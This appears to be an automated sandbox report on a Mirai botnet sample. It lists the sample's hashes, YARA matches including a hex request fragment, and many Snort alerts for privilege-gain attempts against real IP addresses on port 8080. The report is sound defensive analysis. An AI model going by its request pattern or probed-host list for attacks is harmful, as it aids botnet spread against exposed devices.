Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
ZhhHfkNewm.elf

Overview

General Information

Sample name:ZhhHfkNewm.elf
renamed because original name is a hash value
Original sample name:b757694e98b44b2a21e5654c92c98826.elf
Analysis ID:1365724
MD5:b757694e98b44b2a21e5654c92c98826
SHA1:9cb9a03cc21badd27f13ad7a09d44bb1bfb380a6
SHA256:ce192327b8b13edbe3fd6b37c42b16bb0dc59951379fc25b8f6d92ed64e8cc84
Tags:32elfmiraisparc
Infos:

Detection

Mirai
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Mirai
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

General Information

Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1365724
Start date and time:2023-12-21 18:40:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:ZhhHfkNewm.elf
renamed because original name is a hash value
Original Sample Name:b757694e98b44b2a21e5654c92c98826.elf
Detection:MAL
Classification:mal80.troj.linELF@0/1@0/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: ZhhHfkNewm.elf

Runtime Messages

Command:/tmp/ZhhHfkNewm.elf
PID:6206
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
love you ~jun0
Standard Error:

Process Tree

  • system is lnxubuntu20
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ZhhHfkNewm.elfJoeSecurity_Mirai_5Yara detected MiraiJoe Security
    ZhhHfkNewm.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      ZhhHfkNewm.elfMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
      • 0xc470:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      6210.1.00007f19c8011000.00007f19c801f000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
        6210.1.00007f19c8011000.00007f19c801f000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6210.1.00007f19c8011000.00007f19c801f000.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
          • 0xc470:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
          6206.1.00007f19c8011000.00007f19c801f000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
            6206.1.00007f19c8011000.00007f19c801f000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              Click to see the 1 entries

              Snort Signatures

              Timestamp:192.168.2.2391.228.46.895804680802027153 12/21/23-18:42:47.845347
              SID:2027153
              Source Port:58046
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2391.228.46.895804680802026102 12/21/23-18:42:47.845347
              SID:2026102
              Source Port:58046
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23154.9.60.524967880802027153 12/21/23-18:42:47.953556
              SID:2027153
              Source Port:49678
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.149.195.934757080802018132 12/21/23-18:41:55.116812
              SID:2018132
              Source Port:47570
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23109.247.109.524329480802018132 12/21/23-18:41:37.872194
              SID:2018132
              Source Port:43294
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23212.21.157.905989680802026102 12/21/23-18:41:11.082296
              SID:2026102
              Source Port:59896
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23203.234.50.1555502880802018132 12/21/23-18:41:08.603702
              SID:2018132
              Source Port:55028
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23154.9.60.524967880802026102 12/21/23-18:42:47.953556
              SID:2026102
              Source Port:49678
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23194.62.214.2044374080802026102 12/21/23-18:42:21.588714
              SID:2026102
              Source Port:43740
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23212.21.157.905989680802027153 12/21/23-18:41:11.082296
              SID:2027153
              Source Port:59896
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2387.237.122.613923280802018132 12/21/23-18:41:36.805206
              SID:2018132
              Source Port:39232
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23194.62.214.2044374080802027153 12/21/23-18:42:21.588714
              SID:2027153
              Source Port:43740
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23198.41.207.564495680802018132 12/21/23-18:40:56.502176
              SID:2018132
              Source Port:44956
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23162.186.4.1313667080802018132 12/21/23-18:41:31.240052
              SID:2018132
              Source Port:36670
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23115.74.135.2545506280802027153 12/21/23-18:41:10.920310
              SID:2027153
              Source Port:55062
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23146.148.249.1145534480802018132 12/21/23-18:41:27.705727
              SID:2018132
              Source Port:55344
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23115.74.135.2545506280802026102 12/21/23-18:41:10.920310
              SID:2026102
              Source Port:55062
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2380.152.249.785595680802018132 12/21/23-18:41:45.136361
              SID:2018132
              Source Port:55956
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23104.16.197.265383880802018132 12/21/23-18:42:32.302633
              SID:2018132
              Source Port:53838
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2384.231.177.1074206080802027153 12/21/23-18:41:44.581069
              SID:2027153
              Source Port:42060
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2314.74.41.1393875280802018132 12/21/23-18:42:19.160136
              SID:2018132
              Source Port:38752
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23118.58.31.784286280802026102 12/21/23-18:41:17.988159
              SID:2026102
              Source Port:42862
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23195.114.111.835289680802018132 12/21/23-18:41:08.343083
              SID:2018132
              Source Port:52896
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2384.231.177.1074206080802026102 12/21/23-18:41:44.581069
              SID:2026102
              Source Port:42060
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23195.114.111.835289680802027153 12/21/23-18:41:08.343083
              SID:2027153
              Source Port:52896
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2396.228.36.805364680802026102 12/21/23-18:42:19.974779
              SID:2026102
              Source Port:53646
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23195.114.111.835289680802026102 12/21/23-18:41:08.343083
              SID:2026102
              Source Port:52896
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2373.171.251.1233788480802018132 12/21/23-18:41:45.423583
              SID:2018132
              Source Port:37884
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2396.228.36.805364680802027153 12/21/23-18:42:19.974779
              SID:2027153
              Source Port:53646
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2320.157.191.1783469680802018132 12/21/23-18:41:54.182913
              SID:2018132
              Source Port:34696
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2391.228.46.895804680802018132 12/21/23-18:42:47.845347
              SID:2018132
              Source Port:58046
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2334.149.195.934757080802026102 12/21/23-18:41:55.116812
              SID:2026102
              Source Port:47570
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.149.195.934757080802027153 12/21/23-18:41:55.116812
              SID:2027153
              Source Port:47570
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2387.237.122.613923280802026102 12/21/23-18:41:36.805206
              SID:2026102
              Source Port:39232
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.96.234.1893363080802026102 12/21/23-18:41:46.750765
              SID:2026102
              Source Port:33630
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2369.87.220.2463506080802018132 12/21/23-18:41:17.814015
              SID:2018132
              Source Port:35060
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23166.253.31.1105539680802018132 12/21/23-18:42:21.664885
              SID:2018132
              Source Port:55396
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23182.172.28.374865080802027153 12/21/23-18:41:11.250606
              SID:2027153
              Source Port:48650
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2396.238.85.274991280802018132 12/21/23-18:41:18.805007
              SID:2018132
              Source Port:49912
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23156.96.234.1893363080802027153 12/21/23-18:41:46.750765
              SID:2027153
              Source Port:33630
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.55.196.1215668480802026102 12/21/23-18:41:00.108640
              SID:2026102
              Source Port:56684
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23172.65.82.2505411680802027153 12/21/23-18:42:11.595980
              SID:2027153
              Source Port:54116
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2387.237.122.613923280802027153 12/21/23-18:41:36.805206
              SID:2027153
              Source Port:39232
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23182.172.28.374865080802026102 12/21/23-18:41:11.250606
              SID:2026102
              Source Port:48650
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.172.33.1943932280802027153 12/21/23-18:41:31.514403
              SID:2027153
              Source Port:39322
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2396.3.116.233540080802027153 12/21/23-18:42:21.544385
              SID:2027153
              Source Port:35400
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23194.62.214.2044374080802018132 12/21/23-18:42:21.588714
              SID:2018132
              Source Port:43740
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23104.24.78.2553654280802027153 12/21/23-18:41:54.092461
              SID:2027153
              Source Port:36542
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.172.33.1943932280802026102 12/21/23-18:41:31.514403
              SID:2026102
              Source Port:39322
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2378.108.218.754297480802018132 12/21/23-18:41:24.286519
              SID:2018132
              Source Port:42974
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23104.24.78.2553654280802026102 12/21/23-18:41:54.092461
              SID:2026102
              Source Port:36542
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.206.34.2374960080802018132 12/21/23-18:41:17.810451
              SID:2018132
              Source Port:49600
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23172.65.82.2505411680802026102 12/21/23-18:42:11.595980
              SID:2026102
              Source Port:54116
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23118.82.125.2286030880802018132 12/21/23-18:41:10.811233
              SID:2018132
              Source Port:60308
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2396.3.116.233540080802026102 12/21/23-18:42:21.544385
              SID:2026102
              Source Port:35400
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2382.47.115.83591080802018132 12/21/23-18:40:55.358143
              SID:2018132
              Source Port:35910
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23104.16.197.265383880802027153 12/21/23-18:42:32.302633
              SID:2027153
              Source Port:53838
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23118.82.125.2286030880802026102 12/21/23-18:41:10.811233
              SID:2026102
              Source Port:60308
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2380.152.249.785595680802027153 12/21/23-18:41:45.136361
              SID:2027153
              Source Port:55956
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2378.108.218.754297480802027153 12/21/23-18:41:24.286519
              SID:2027153
              Source Port:42974
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2380.152.249.785595680802026102 12/21/23-18:41:45.136361
              SID:2026102
              Source Port:55956
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2320.157.191.1783469680802027153 12/21/23-18:41:54.182913
              SID:2027153
              Source Port:34696
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23146.70.52.2374833880802018132 12/21/23-18:40:59.797048
              SID:2018132
              Source Port:48338
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2382.47.115.83591080802026102 12/21/23-18:40:55.358143
              SID:2026102
              Source Port:35910
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2320.157.191.1783469680802026102 12/21/23-18:41:54.182913
              SID:2026102
              Source Port:34696
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23211.250.133.424649880802018132 12/21/23-18:41:08.285336
              SID:2018132
              Source Port:46498
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2382.47.115.83591080802027153 12/21/23-18:40:55.358143
              SID:2027153
              Source Port:35910
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23118.82.125.2286030880802027153 12/21/23-18:41:10.811233
              SID:2027153
              Source Port:60308
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23198.41.207.564495680802026102 12/21/23-18:40:56.502176
              SID:2026102
              Source Port:44956
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23198.41.207.564495680802027153 12/21/23-18:40:56.502176
              SID:2027153
              Source Port:44956
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.24.78.2553654280802842117 12/21/23-18:41:54.092461
              SID:2842117
              Source Port:36542
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2314.74.41.1393875280802026102 12/21/23-18:42:19.160136
              SID:2026102
              Source Port:38752
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.16.197.265383880802026102 12/21/23-18:42:32.302633
              SID:2026102
              Source Port:53838
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.55.196.1215668480802027153 12/21/23-18:41:00.108640
              SID:2027153
              Source Port:56684
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23180.81.166.1213502080802018132 12/21/23-18:41:17.989761
              SID:2018132
              Source Port:35020
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23162.186.4.1313667080802026102 12/21/23-18:41:31.240052
              SID:2026102
              Source Port:36670
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23182.172.28.374865080802018132 12/21/23-18:41:11.250606
              SID:2018132
              Source Port:48650
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2314.74.41.1393875280802027153 12/21/23-18:42:19.160136
              SID:2027153
              Source Port:38752
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23162.186.4.1313667080802027153 12/21/23-18:41:31.240052
              SID:2027153
              Source Port:36670
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23118.62.235.145542080802018132 12/21/23-18:41:36.925155
              SID:2018132
              Source Port:55420
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23104.24.24.1355136480802018132 12/21/23-18:41:18.928967
              SID:2018132
              Source Port:51364
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23118.36.207.1473683680802026102 12/21/23-18:41:23.464653
              SID:2026102
              Source Port:36836
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2384.231.177.1074206080802018132 12/21/23-18:41:44.581069
              SID:2018132
              Source Port:42060
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23185.36.54.35767680802018132 12/21/23-18:42:46.268253
              SID:2018132
              Source Port:57676
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23118.36.207.1473683680802027153 12/21/23-18:41:23.464653
              SID:2027153
              Source Port:36836
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23177.191.56.115103280802018132 12/21/23-18:41:50.882999
              SID:2018132
              Source Port:51032
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2313.229.49.1974094480802018132 12/21/23-18:42:47.393204
              SID:2018132
              Source Port:40944
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23118.58.31.784286280802018132 12/21/23-18:41:17.988159
              SID:2018132
              Source Port:42862
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23115.74.135.2545506280802018132 12/21/23-18:41:10.920310
              SID:2018132
              Source Port:55062
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23177.191.56.115103280802027153 12/21/23-18:41:50.882999
              SID:2027153
              Source Port:51032
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23177.191.56.115103280802026102 12/21/23-18:41:50.882999
              SID:2026102
              Source Port:51032
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.36.54.35767680802027153 12/21/23-18:42:46.268253
              SID:2027153
              Source Port:57676
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2396.228.36.805364680802018132 12/21/23-18:42:19.974779
              SID:2018132
              Source Port:53646
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23118.62.235.145542080802027153 12/21/23-18:41:36.925155
              SID:2027153
              Source Port:55420
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2369.87.220.2463506080802026102 12/21/23-18:41:17.814015
              SID:2026102
              Source Port:35060
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2369.87.220.2463506080802027153 12/21/23-18:41:17.814015
              SID:2027153
              Source Port:35060
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23118.58.31.784286280802027153 12/21/23-18:41:17.988159
              SID:2027153
              Source Port:42862
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23146.148.249.1145534480802026102 12/21/23-18:41:27.705727
              SID:2026102
              Source Port:55344
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2345.55.196.1215668480802018132 12/21/23-18:41:00.108640
              SID:2018132
              Source Port:56684
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23104.206.34.2374960080802027153 12/21/23-18:41:17.810451
              SID:2027153
              Source Port:49600
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23146.148.249.1145534480802027153 12/21/23-18:41:27.705727
              SID:2027153
              Source Port:55344
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23118.36.207.1473683680802018132 12/21/23-18:41:23.464653
              SID:2018132
              Source Port:36836
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23109.247.109.524329480802026102 12/21/23-18:41:37.872194
              SID:2026102
              Source Port:43294
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23118.62.235.145542080802026102 12/21/23-18:41:36.925155
              SID:2026102
              Source Port:55420
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.36.54.35767680802026102 12/21/23-18:42:46.268253
              SID:2026102
              Source Port:57676
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23180.81.166.1213502080802027153 12/21/23-18:41:17.989761
              SID:2027153
              Source Port:35020
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.24.78.2553654280802018132 12/21/23-18:41:54.092461
              SID:2018132
              Source Port:36542
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23109.247.109.524329480802027153 12/21/23-18:41:37.872194
              SID:2027153
              Source Port:43294
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23212.21.157.905989680802018132 12/21/23-18:41:11.082296
              SID:2018132
              Source Port:59896
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23166.253.31.1105539680802026102 12/21/23-18:42:21.664885
              SID:2026102
              Source Port:55396
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23154.9.60.524967880802018132 12/21/23-18:42:47.953556
              SID:2018132
              Source Port:49678
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23104.24.24.1355136480802027153 12/21/23-18:41:18.928967
              SID:2027153
              Source Port:51364
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23180.81.166.1213502080802026102 12/21/23-18:41:17.989761
              SID:2026102
              Source Port:35020
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.24.24.1355136480802026102 12/21/23-18:41:18.928967
              SID:2026102
              Source Port:51364
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23166.253.31.1105539680802027153 12/21/23-18:42:21.664885
              SID:2027153
              Source Port:55396
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2313.229.49.1974094480802026102 12/21/23-18:42:47.393204
              SID:2026102
              Source Port:40944
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23211.250.133.424649880802027153 12/21/23-18:41:08.285336
              SID:2027153
              Source Port:46498
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2313.229.49.1974094480802027153 12/21/23-18:42:47.393204
              SID:2027153
              Source Port:40944
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23203.234.50.1555502880802027153 12/21/23-18:41:08.603702
              SID:2027153
              Source Port:55028
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23211.250.133.424649880802026102 12/21/23-18:41:08.285336
              SID:2026102
              Source Port:46498
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23146.70.52.2374833880802027153 12/21/23-18:40:59.797048
              SID:2027153
              Source Port:48338
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2396.3.116.233540080802018132 12/21/23-18:42:21.544385
              SID:2018132
              Source Port:35400
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.23203.234.50.1555502880802026102 12/21/23-18:41:08.603702
              SID:2026102
              Source Port:55028
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2396.238.85.274991280802026102 12/21/23-18:41:18.805007
              SID:2026102
              Source Port:49912
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2373.171.251.1233788480802026102 12/21/23-18:41:45.423583
              SID:2026102
              Source Port:37884
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2378.108.218.754297480802026102 12/21/23-18:41:24.286519
              SID:2026102
              Source Port:42974
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23172.65.82.2505411680802018132 12/21/23-18:42:11.595980
              SID:2018132
              Source Port:54116
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2396.238.85.274991280802027153 12/21/23-18:41:18.805007
              SID:2027153
              Source Port:49912
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23156.96.234.1893363080802018132 12/21/23-18:41:46.750765
              SID:2018132
              Source Port:33630
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
